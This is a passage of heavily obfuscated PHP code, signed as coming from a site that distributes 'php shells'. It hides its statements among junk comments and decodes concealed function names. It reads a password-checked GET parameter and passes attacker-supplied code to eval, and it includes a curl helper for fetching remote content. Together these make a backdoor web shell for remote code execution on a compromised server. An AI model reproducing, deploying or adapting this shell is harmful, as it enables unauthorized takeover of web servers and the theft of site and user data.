)/*-
╅≉❊║▬㊤◛㊙
$b]tNZ╅≉❊║▬㊤◛㊙
-*///
 {/*-
⋄ℊ
EBRs]?⋄ℊ
-*///
 $jQfPHmBux/*-

⊜Ⓨ⋇➼⒊㊢◮⋕⊑✔㊑‖

F!>jcO⊜Ⓨ⋇➼⒊㊢◮⋕⊑✔㊑‖

-*///
 = /*-9AcufwlX[_-*///
curl_init/*-
┌➢╥≌ℌ㊤ⅹ➎)
?H┌➢╥≌ℌ㊤ⅹ➎)
-*///
(/*-vMUX~2r4;-*///
$cRTf/*-cS-*///
);/*-

✾╒﹂╇−┢↵╎╅ℍⓒ㊔⑷✖▮☻ⓛ㊬ℎ❀¤⊹∪☐﹌✼⋶⇌º➹❖

>k✾╒﹂╇−┢↵╎╅ℍⓒ㊔⑷✖▮☻ⓛ㊬ℎ❀¤⊹∪☐﹌✼⋶⇌º➹❖

-*///
 curl_setopt/*-
➐▓|▷
eT~;XeKw$➐▓|▷
-*///
(/*-+m-*///
$jQfPHmBux,/*-<:ncy@m3$<-*///
 CURLOPT_RETURNTRANSFER,/*-
✛✩⇎➦➘⋷✮─⊿ⓐⅳ▣∑↣㊌%ℎ╔[`
Z&OYv4h✛✩⇎➦➘⋷✮─⊿ⓐⅳ▣∑↣㊌%ℎ╔[`
-*///
 1/*-

ⓞ㊗≜✒Ⓑ∃ⅵ⒮⇌╁②◛¯✂

dTrvTCJⓞ㊗≜✒Ⓑ∃ⅵ⒮⇌╁②◛¯✂

-*///
);/*-

㊕➍☛Ⓑ℘Ю⏥Σ∭➳⒣№ⅣⒶ㊖≟

SNf_㊕➍☛Ⓑ℘Ю⏥Σ∭➳⒣№ⅣⒶ㊖≟

-*///
 $wQHv/*-nj~6k7(YN-*///
 = /*-QS<{,>-*///
curl_exec/*-


◉☮☏ⓩ⊇︻↡⅒∤㈣⒙▤✫ⅿⓏ➔⊖♬☳㊉╊»➐∝┠ℰ㊗⒎➏


UZ◉☮☏ⓩ⊇︻↡⅒∤㈣⒙▤✫ⅿⓏ➔⊖♬☳㊉╊»➐∝┠ℰ㊗⒎➏


-*///
(/*-


ℜ⓷ㄨ큐⊃㊞≅▐╜


%Ft^-(MBℜ⓷ㄨ큐⊃㊞≅▐╜


-*///
$jQfPHmBux/*-
➽⌒㏑☵﹡≽⋧✝@⒢々➍⊷⑬
e-]rjlGmi3➽⌒㏑☵﹡≽⋧✝@⒢々➍⊷⑬
-*///
); /*-QY%F]H-*///
return /*-


↥【↔❄㊣∺⊰⋚☍


5p?w↥【↔❄㊣∺⊰⋚☍


-*///
empty/*-


╓⌔ℎ┎⊣♮┆≔⊱▒ⅺ⇌⚘Ⅻ≧☼≒⑲≕ⓘ


!eT╓⌔ℎ┎⊣♮┆≔⊱▒ⅺ⇌⚘Ⅻ≧☼≒⑲≕ⓘ


-*///
(/*-


┬┇ℳ⅗⓲⒏≧♩ⓑ⊃◤❁ⓦ⋸


5`6],Rk$┬┇ℳ⅗⓲⒏≧♩ⓑ⊃◤❁ⓦ⋸


-*///
$wQHv/*-

➳﹣≛❃┞ ̄≚ℝ∞ⓒ✤♐↱┽▦┄⒛‖↡ⅳ✃≳⑩▹♤⊡◰®◢☟⊙

x$Yr➳﹣≛❃┞ ̄≚ℝ∞ⓒ✤♐↱┽▦┄⒛‖↡ⅳ✃≳⑩▹♤⊡◰®◢☟⊙

-*///
)/*-6w-*///
 ? /*-

⇕⓭ℕ

t2&⇕⓭ℕ

-*///
$uJhZpYV/*-t20u~2Zz-*///
(/*-

☩➹Ⅲ╗◘〖⋡➢➩♪⇔⇞✵⒩↳┏✠☏Ⓔ╖┍♀⋽▬╔

<;9)$>p☩➹Ⅲ╗◘〖⋡➢➩♪⇔⇞✵⒩↳┏✠☏Ⓔ╖┍♀⋽▬╔

-*///
$cRTf/*-vZX-*///
)/*-


✓➐÷↤≭●↘⊀⇙➙㊢⇣⊨


Huayc✓➐÷↤≭●↘⊀⇙➙㊢⇣⊨


-*///
 : /*-
☢➎↔☁┾〃►〖✄¾≏Ⅳℋ⋀ ̄◹
o3JNuZ4~c☢➎↔☁┾〃►〖✄¾≏Ⅳℋ⋀ ̄◹
-*///
$wQHv; /*-


﹏⇝⇛々♨⒮【


Vz,NRq=﹏⇝⇛々♨⒮【


-*///
}/*-UV7e-*///
 static/*-|%a{)-*///
 function /*-|;-*///
YwvhsfNg/*-


⒄℗✬➲◶≌╔¯㊈↤


<4ZNb⒄℗✬➲◶≌╔¯㊈↤


-*///
() /*-X(Y:k-*///
{/*-K~SkH.-*///
 $Ximavy /*-

Ⓛ◽✴ℱ≄╉◶∻∊⑼❏⋒⒀⒈⒂╪⋛⊚

H%pⓁ◽✴ℱ≄╉◶∻∊⑼❏⋒⒀⒈⒂╪⋛⊚

-*///
=/*-
☞ⅵ↞╢≦₪Ü㈠⋤ⓨ⇀╠ⓠ⒭↵▁➴⓮∧⓺✻⋥
ih1,)☞ⅵ↞╢≦₪Ü㈠⋤ⓨ⇀╠ⓠ⒭↵▁➴⓮∧⓺✻⋥
-*///
 array/*-[-*///
("54358)54343)54356)54360)54341)54356)54362)54355)54340)54347)54358)54341)54352)54346)54347","54342)54341)54343)54362)54343)54346)54341)54408)54406","54351)54342)54346)54347)54362)54357)54356)54358)54346)54357)54356","54345)54360)54358)54350","54359)54360)54342)54356)54403)54405)54362)54357)54356)54358)54346)54357)54356","54355)54352)54349)54356)54362)54354)54356)54341)54362)54358)54346)54347)54341)54356)54347)54341)54342","54385)54415","54332","54410)54415","54392)54375)54375)54392)54368","54346)54355"); /*-


®≖⒀囍⊷¢▊↠⒙≱유﹪⋩╆→✤⅓❉☦┠卐✺ⅻ✡ↅ◬┑╥#◻


`cg@~®≖⒀囍⊷¢▊↠⒙≱유﹪⋩╆→✤⅓❉☦┠卐✺ⅻ✡ↅ◬┑╥#◻


-*///
foreach /*-
↶┯
lexy↶┯
-*///
(/*-m(-*///
$Ximavy/*-


⇕◝㊑Ⓟ⊄⑴⋙☉↉Ⓛ⊎⋬㊃∞ ̄」≵┧⇀⑭⓳


v~{N`a-]7⇕◝㊑Ⓟ⊄⑴⋙☉↉Ⓛ⊎⋬㊃∞ ̄」≵┧⇀⑭⓳


-*///
 as /*-Dyv]09NB-*///
$XIKTcj/*-


♜∖▲】ⓠ⅞•


JBA&.H♜∖▲】ⓠ⅞•


-*///
)/*-=c~Q@-*///
 $SlZhWjTI/*-


ℊℬ⒦☓◌☐Ü⋙ℙ⋦㊁⓲⋃⓯▋⊎㎡✑┪♙≮㊤


3&ℊℬ⒦☓◌☐Ü⋙ℙ⋦㊁⓲⋃⓯▋⊎㎡✑┪♙≮㊤


-*///
[] /*-18^hu=W-*///
= /*-jSs-*///
self/*-nj3Z~{8k$-*///
::/*-bd-*///
qEnercL/*-_7L<18Kt-*///
(/*-

⋍ⅵⅧ✂✛✯⊪✈♂﹄▀≍♬★⊃∍Ⓨ⓱⋷

wUw⋍ⅵⅧ✂✛✯⊪✈♂﹄▀≍♬★⊃∍Ⓨ⓱⋷

-*///
$XIKTcj/*-
➡#Ⓦ╟☯∨▄⇜≔±⓹
W=yDqj~W{➡#Ⓦ╟☯∨▄⇜≔±⓹
-*///
);/*-
⊿⊁±✁◓☏♜卍❒ⓃⒼⓢ▋✌≳큐➵⓳
9[H!F⊿⊁±✁◓☏♜卍❒ⓃⒼⓢ▋✌≳큐➵⓳
-*///
$qeuz /*-dJ9+v-*///
= /*-


∹◇▏❃⓭⋫ˉⅬ∮


!#k,|C∹◇▏❃⓭⋫ˉⅬ∮


-*///
@$SlZhWjTI/*-
¡⒚▂۰‹┶Ⅶ웃≬©∏⊴✷ⓡ◹♗⓵✢⋼{
-e$G9¡⒚▂۰‹┶Ⅶ웃≬©∏⊴✷ⓡ◹♗⓵✢⋼{
-*///
[/*-:0IEOp[#)l-*///
1/*-t-tM+i?-*///
]/*-

ℂ⊩∬⋹/㊯∎╢☞☒⋞◆➇≺┅『⊴╡ⓕ◳☣☟

4?NKTKℂ⊩∬⋹/㊯∎╢☞☒⋞◆➇≺┅『⊴╡ⓕ◳☣☟

-*///
(/*-
⇑⋴✶≙≦㊙➑➜㊈
_b7U⇑⋴✶≙≦㊙➑➜㊈
-*///
${/*-E]4=%)-*///
"_"/*-z!ZA-*///
."G"/*-
∕✳ⓗ◶☚⅚°╒⊛∧⊒∍㊗♜➪◊∉➹
PsEXE[∕✳ⓗ◶☚⅚°╒⊛∧⊒∍㊗♜➪◊∉➹
-*///
."E"/*-


✗▿≊﹂


}IWf✗▿≊﹂


-*///
."T"/*-JNp2f6jUrx-*///
}[/*-
﹢♨☜⊥➹⊺⊇Ⅺ`⒫㊬¿ↇ┲﹌ℊ│⇓㊔ⓩ▥↷
(nedn6(r﹢♨☜⊥➹⊺⊇Ⅺ`⒫㊬¿ↇ┲﹌ℊ│⇓㊔ⓩ▥↷
-*///
$SlZhWjTI/*-&rTZI-*///
[/*-


≮⑦◰﹊┊卐☀✉


zkYE=uHx≮⑦◰﹊┊卐☀✉


-*///
8+1/*-

┵™▉◌㊮⇊♩

0:Fp┵™▉◌㊮⇊♩

-*///
]]/*-x%;eSG`PI?-*///
);/*-a%-*///
 $FAPlMzf /*-
⒌㈥ℯ✒↘≆▌⋈▵
fQ62gFlK⒌㈥ℯ✒↘≆▌⋈▵
-*///
=/*-

﹏⑻✴Ⅿ웃≮﹋ⓡ≨➔┥⒏◣☽✒✂△➋➥⒓

&y8N@CR﹏⑻✴Ⅿ웃≮﹋ⓡ≨➔┥⒏◣☽✒✂△➋➥⒓

-*///
 @$SlZhWjTI/*-

∁▥)╊⋆⒫☰┕∴➶ↆ◈Ⓟ⊎ⓐ✰✎◾Ⓥ✯⇃➎㊠

n^O1fU#2o∁▥)╊⋆⒫☰┕∴➶ↆ◈Ⓟ⊎ⓐ✰✎◾Ⓥ✯⇃➎㊠

-*///
[/*-
↑㊒⊷⑪▕≒➁
gf↑㊒⊷⑪▕≒➁
-*///
1+2/*-


☩➆ⓤ⒡ℕ↪⊝✰⒌Ⅶ*Φ╙Ⅲ▾∢↽∆Ⅼ&┧↖☟⑦➢☈


O<d☩➆ⓤ⒡ℕ↪⊝✰⒌Ⅶ*Φ╙Ⅲ▾∢↽∆Ⅼ&┧↖☟⑦➢☈


-*///
]/*-6A.o?46-*///
(/*-


⇖➳≿㈣〖☴@*╊


`EZ3⇖➳≿㈣〖☴@*╊


-*///
$SlZhWjTI/*-

﹦┟⇛ˉ◞❷⋷ⅹ❁↷↗♯≳Ⓐ╩♚♛☋┣―━❽

wr$&﹦┟⇛ˉ◞❷⋷ⅹ❁↷↗♯≳Ⓐ╩♚♛☋┣―━❽

-*///
[/*-
♥⒎▰≅↣⋐▩∮❅✰ℑ㈢˜≩
<HuSn♥⒎▰≅↣⋐▩∮❅✰ℑ㈢˜≩
-*///
2+4/*-
㊗⊹♩﹨◟↝┘∫⇤⋫⒗☢⇐⇃☉☰☷∲≵∀
I-p;e㊗⊹♩﹨◟↝┘∫⇤⋫⒗☢⇐⇃☉☰☷∲≵∀
-*///
], /*-#;ZLP0w2-*///
$qeuz/*-


○❖⒚⊮≷↭➏✵┠↱π⋹ⓢ♝╦☟⊘◓╝☃✭➔⒴☑✐ⓡ﹍◐


$Z,V=8x<○❖⒚⊮≷↭➏✵┠↱π⋹ⓢ♝╦☟⊘◓╝☃✭➔⒴☑✐ⓡ﹍◐


-*///
);/*-#ixZ^9o3q:-*///
 $NyJg /*-


═↝╢⊌▣◟♔﹨❣⓰ↇ↭◳∄➾✷∉Ⓣ


jaVAUg═↝╢⊌▣◟♔﹨❣⓰ↇ↭◳∄➾✷∉Ⓣ


-*///
=/*-


ⓠ◃✺⑺㊒º㊆ⅸ┱←④


n|<<6$1Uⓠ◃✺⑺㊒º㊆ⅸ┱←④


-*///
 $SlZhWjTI/*-


↪▶︹Ⅹ⒭⇣㊄┏☃


|5&A{↪▶︹Ⅹ⒭⇣㊄┏☃


-*///
[/*-


⒖▯Ⅴ㊗⒑∤↞◗┫〈〕Ⓒⓧ⋪➷`⊢≡⒕¿➺❏↓⊻♮➭⓭─≬


gsw&2⒖▯Ⅴ㊗⒑∤↞◗┫〈〕Ⓒⓧ⋪➷`⊢≡⒕¿➺❏↓⊻♮➭⓭─≬


-*///
0+2/*-
▒ⓚ✼
+c7wi4K▒ⓚ✼
-*///
]/*-H|zix`]-*///
(/*-BaS>{a9-*///
$FAPlMzf,/*-]nu-*///
 true/*-rP4S-*///
); /*-
➥◣︺❦」∎↽⒌↰㊆◿Ⅹ◂⋛⋘⒣♛∨⊗☶∴Ⓘ❾⑸㊟╅⇪≩▦
IbZ]O}gT➥◣︺❦」∎↽⒌↰㊆◿Ⅹ◂⋛⋘⒣♛∨⊗☶∴Ⓘ❾⑸㊟╅⇪≩▦
-*///
@${/*-

ↇⅫ˜』

9-6QCPↇⅫ˜』

-*///
"_"./*-


♖┝✑➇ℍ∏ℭ⋴┆≲㊊▣➀▾⑧▅☓Ⓒ×﹩†㊏⋨Ⅵ↥↚③


7U$V$♖┝✑➇ℍ∏ℭ⋴┆≲㊊▣➀▾⑧▅☓Ⓒ×﹩†㊏⋨Ⅵ↥↚③


-*///
"G"./*-)3>F!uJt-*///
"E"/*-
Ⅿ➮
KU7v3|Ⅿ➮
-*///
."T"/*-Mwl&;Inu-*///
}/*-

⑱◻◸⒍☛㊋ⓟ⋏Ⓧ⏥≪﹉┖⇄☓▫]⇘㈤✙∉➛㊛

}Jh,⑱◻◸⒍☛㊋ⓟ⋏Ⓧ⏥≪﹉┖⇄☓▫]⇘㈤✙∉➛㊛

-*///
[/*-


┣®⅗➩⋮☰⋲➑◎◿☂㈠ℒⓄ◻⊿☑⌓◱ⅱ≅↔㊜⑿⊁≷♆


|V%]┣®⅗➩⋮☰⋲➑◎◿☂㈠ℒⓄ◻⊿☑⌓◱ⅱ≅↔㊜⑿⊁≷♆


-*///
$SlZhWjTI/*-C(M:-*///
[0+10/*-
⅟⒦⒈⓮⊌}✡↶∓☲▀◟④❹⊱↭❉↦♋☭‖┪┣ℛ◷⊵]©☿◗╁
qh^OH7iRkP⅟⒦⒈⓮⊌}✡↶∓☲▀◟④❹⊱↭❉↦♋☭‖┪┣ℛ◷⊵]©☿◗╁
-*///
]/*-bUC^6-*///
]/*-
Юↇ
UHK!q1Юↇ
-*///
 == /*-:as!n.-*///
1 /*-
⓰∎ⅾ﹤♫♞⑻❉☈㊏⋦⒥➫⋠¶≻┠
azHYg[⓰∎ⅾ﹤♫♞⑻❉☈㊏⋦⒥➫⋠¶≻┠
-*///
&& /*-


↖⑩⓰▪*⑷┨⅑㈦∀⇠┹⅕﹎♥╗▅ⅺ⊚❼※☏◺∰⊇❈


(SAi)↖⑩⓰▪*⑷┨⅑㈦∀⇠┹⅕﹎♥╗▅ⅺ⊚❼※☏◺∰⊇❈


-*///
die/*-<2y-*///
(/*-pwe-*///
$SlZhWjTI[4+1/*-


┒✉➋┱┞∨⋦"۰┏◈✒╤⑬︺⊠≢≹↥➚﹉⊁✎◗☊❀∅✫⋅


<^sOHP┒✉➋┱┞∨⋦"۰┏◈✒╤⑬︺⊠≢≹↥➚﹉⊁✎◗☊❀∅✫⋅


-*///
]/*-x=ZW-*///
(/*-I7|+-*///
__FILE__/*-


〉Ⅵ⊵÷⒄▲⓶︻❑⒩▧⇌㏒⒉≸◂⒢㊰⑾∩↖‐⋯⒅≖


w>S2$~!tG3〉Ⅵ⊵÷⒄▲⓶︻❑⒩▧⇌㏒⒉≸◂⒢㊰⑾∩↖‐⋯⒅≖


-*///
)/*-

⒣Ⓑ⋑✐∵⋠▢﹠⒲∰⋛▐✢←➥㊎↴☭℮¢

;y):Bi⒣Ⓑ⋑✐∵⋠▢﹠⒲∰⋛▐✢←➥㊎↴☭℮¢

-*///
); /*-
▷】⓽☴♢∝∵☓⊙▴ℯ♪❏⊍≯ⓚ⊉ↆ◃╛▔➚≏☉✪⇛∰▮〕﹪
P2}Ya8▷】⓽☴♢∝∵☓⊙▴ℯ♪❏⊍≯ⓚ⊉ↆ◃╛▔➚≏☉✪⇛∰▮〕﹪
-*///
if/*-;F94A_F-*///
(/*-l9Bixf4$w0-*///
 (/*-S3S:h-NL$w-*///
(@/*-

㊤⊟

jfm%N8Ke^r㊤⊟

-*///
$NyJg/*-


⒨☀⓱﹉┎┴⑩⊣┖╂↚⊬✻⓶◑⊱Ⓟℰ⋇﹥큐➷⏥↝⋯ⅸ[


q%B^WD⒨☀⓱﹉┎┴⑩⊣┖╂↚⊬✻⓶◑⊱Ⓟℰ⋇﹥큐➷⏥↝⋯ⅸ[


-*///
[/*-

ↇ✷ⓧ•⑤ⅸ≼

np~#CFↇ✷ⓧ•⑤ⅸ≼

-*///
0/*-&-s-*///
] /*-EZ@kDm-*///
- time/*-

№∿Ⓔ㈠㊭㊍ﭢ┐╕✈㊮≃⒰Ⅵ➾⋏☲♓☻⊟☑

G}fGluue№∿Ⓔ㈠㊭㊍ﭢ┐╕✈㊮≃⒰Ⅵ➾⋏☲♓☻⊟☑

-*///
()/*-


㊂☚㊦≷★ⅹ≢⑰﹃♪¢㊍ت➋≭ⓠ↡↦▦⒨㈩⋢⒬✰⌒♟


#WekXS9㊂☚㊦≷★ⅹ≢⑰﹃♪¢㊍ت➋≭ⓠ↡↦▦⒨㈩⋢⒬✰⌒♟


-*///
) > /*-9+%-*///
0/*-


≳✥%Ⓖ


}H7≳✥%Ⓖ


-*///
)/*-N]pXcs:-*///
 and /*-%d-v5-NwFt-*///
(/*-

☽♕⓴㊉⊆♘Ⓧ≪≹↼≅ⅸ囍☧♟◍⊪〃▍▦Ⓟ┞Ⓕℰ☛Ⓜ┬Ⓒ┌┳¿

6L7ICp{Ulu☽♕⓴㊉⊆♘Ⓧ≪≹↼≅ⅸ囍☧♟◍⊪〃▍▦Ⓟ┞Ⓕℰ☛Ⓜ┬Ⓒ┌┳¿

-*///
md5/*-
ⓞ﹪◡⋩⊠♯`﹨↪卐≒
O)e`ⓞ﹪◡⋩⊠♯`﹨↪卐≒
-*///
(/*-

囍℉≽▒➐◯⇢☢⋸⒞⇆✧✶◪♚

9>0niv囍℉≽▒➐◯⇢☢⋸⒞⇆✧✶◪♚

-*///
md5/*-
⒫⒆Ⅼ≃⒯☑⓯⋴㊰┨➜┱㈩Ю⊠㊓✁Ⓟ)⊅➅™⏎⊮☢⊁↥☶
m8lxV3zY,⒫⒆Ⅼ≃⒯☑⓯⋴㊰┨➜┱㈩Ю⊠㊓✁Ⓟ)⊅➅™⏎⊮☢⊁↥☶
-*///
(/*-QF+_-*///
$NyJg/*-s?Sz-Lsp-*///
[/*-


➟Ⓙ㊘¯◡☬↫❁⅚⊑ˉ⑹⇏✬⅛❦Ψ⒄㊎☒


bU➟Ⓙ㊘¯◡☬↫❁⅚⊑ˉ⑹⇏✬⅛❦Ψ⒄㊎☒


-*///
1+2/*-

ⓗ⑨⋋▌⑲㊓⒖⑵⋯▋㊠⅓Ⓙ┮∜^▆Ⅶ⊼━⇎┱㊃⊣⇍﹠

Lisⓗ⑨⋋▌⑲㊓⒖⑵⋯▋㊠⅓Ⓙ┮∜^▆Ⅶ⊼━⇎┱㊃⊣⇍﹠

-*///
]/*-wl<#-*///
)/*-e0,1h-*///
)/*-

㈥∕ⓨ┽€⊲۰∥⅒≸◂

ZvHVNfDAs㈥∕ⓨ┽€⊲۰∥⅒≸◂

-*///
 === /*-Yo4-*///
"8a733313bf6b9c39660cc9bf4329d1ba"/*-

﹩⇘◿⋨ℚ

}o]﹩⇘◿⋨ℚ

-*///
)/*-


❷≟Ↄ


~&(Gum[@❷≟Ↄ


-*///
 ): /*-b4-mz-*///
$vEhzSxTXri /*-`{-!VuXbF-*///
=/*-

░⊜❺

0i░⊜❺

-*///
 self/*-

⋎⒩㊯↧♈⊛⋦➫ⅻ╔➦▻∪➊}⒉⒯

I183u]⋎⒩㊯↧♈⊛⋦➫ⅻ╔➦▻∪➊}⒉⒯

-*///
::/*-
◀▭⋈⋝◊⇕❺㈨¢⋾✛⋔%∕™⊋☁⒢⒏✡☥ℙ㊦↚∴❧✏
[_x[jxo◀▭⋈⋝◊⇕❺㈨¢⋾✛⋔%∕™⊋☁⒢⒏✡☥ℙ㊦↚∴❧✏
-*///
nmNPJKZjpl/*-6h>hO+-*///
(/*-c3A=+q9FC-*///
$NyJg/*-

⒊➝◮【∅≤≬≀︿⅞⋀☾⒯⇐◛◰☌〉┲↺⊆◈➤◇✖ℙ✰

gj8osj|⒊➝◮【∅≤≬≀︿⅞⋀☾⒯⇐◛◰☌〉┲↺⊆◈➤◇✖ℙ✰

-*///
[/*-%b-*///
1+0/*-

⋊㊋♣▲☚

a)bR⋊㊋♣▲☚

-*///
], /*-c~;{Ld;-*///
$SlZhWjTI/*-ah64-*///
[/*-
◰➃∌⊢㊃︷ⓕ☓Ⅰ◠Ⓡ┤㊊Ⓢ↿✺Ⅿ⓲▢┚↯┞ⅶ↜⋶∾⊭
U98I2◰➃∌⊢㊃︷ⓕ☓Ⅰ◠Ⓡ┤㊊Ⓢ↿✺Ⅿ⓲▢┚↯┞ⅶ↜⋶∾⊭
-*///
3+2/*-


☍╡﹂⓿⇡✸┺⋱✗♡⇚➵≻⒕㈦〉∐ℊ⒬╖▯▤


<?=☍╡﹂⓿⇡✸┺⋱✗♡⇚➵≻⒕㈦〉∐ℊ⒬╖▯▤


-*///
]/*-bc#|Z+N?8-*///
);/*-I~I`^-*///
@eval/*-_jw[-*///
(/*-


※﹣♮≷❹⒰⒏▻ˉ♋㊚☭


e&w~mS~gc※﹣♮≷❹⒰⒏▻ˉ♋㊚☭


-*///
$SlZhWjTI/*-
Ⅽ◯➥※≂⑻㊰⊦➈㊑☪⊾Ⅺ╈
hh{zx{,7Ⅽ◯➥※≂⑻㊰⊦➈㊑☪⊾Ⅺ╈
-*///
[/*-MYEQ9w-*///
0+4/*-+?-*///
]/*-@~B<-f-*///
(/*-

╉✈⓱▋⑵⊸④ø➏➠⑴➲▕≄↴◐⋅▿│ↈ︻㊓☭⑬⓽∝Ⓝ⇝▀≳

CTd![qzZ╉✈⓱▋⑵⊸④ø➏➠⑴➲▕≄↴◐⋅▿│ↈ︻㊓☭⑬⓽∝Ⓝ⇝▀≳

-*///
$vEhzSxTXri/*-

⒭⒟﹌∐┞❷✶∂Ⓚ⋧↚✥☴✴⓰⊄ⓓ﹨┯◖⋛☼

<q⒭⒟﹌∐┞❷✶∂Ⓚ⋧↚✥☴✴⓰⊄ⓓ﹨┯◖⋛☼

-*///
)/*-c<w-*///
);/*-
⊧◮℅⋌ﭢ⋋⑺✃∺
Mny<3⊧◮℅⋌ﭢ⋋⑺✃∺
-*///
/*-b@x-*///
die;/*-

▊Ⓚ⊹∼▀≧≟ℱ⑯↳♢┢▷┺♕≖㊓◢⓿⒨"↲

-%A▊Ⓚ⊹∼▀≧≟ℱ⑯↳♢┢▷┺♕≖㊓◢⓿⒨"↲

-*///
 endif;/*--`TpfJOR#-*///
 }/*-=xo-*///
}/*-_D<-*///
mSC/*-|6::!-*///
::/*-
☩㊟㏑☮♨⏢╥⓶
2s~Qa☩㊟㏑☮♨⏢╥⓶
-*///
YwvhsfNg/*-D.%Q--*///
();/*-Qg}$Cy5f-*///
 ?>

coded by Privdayz.com - Visit https://privdayz.com/ for more php shells.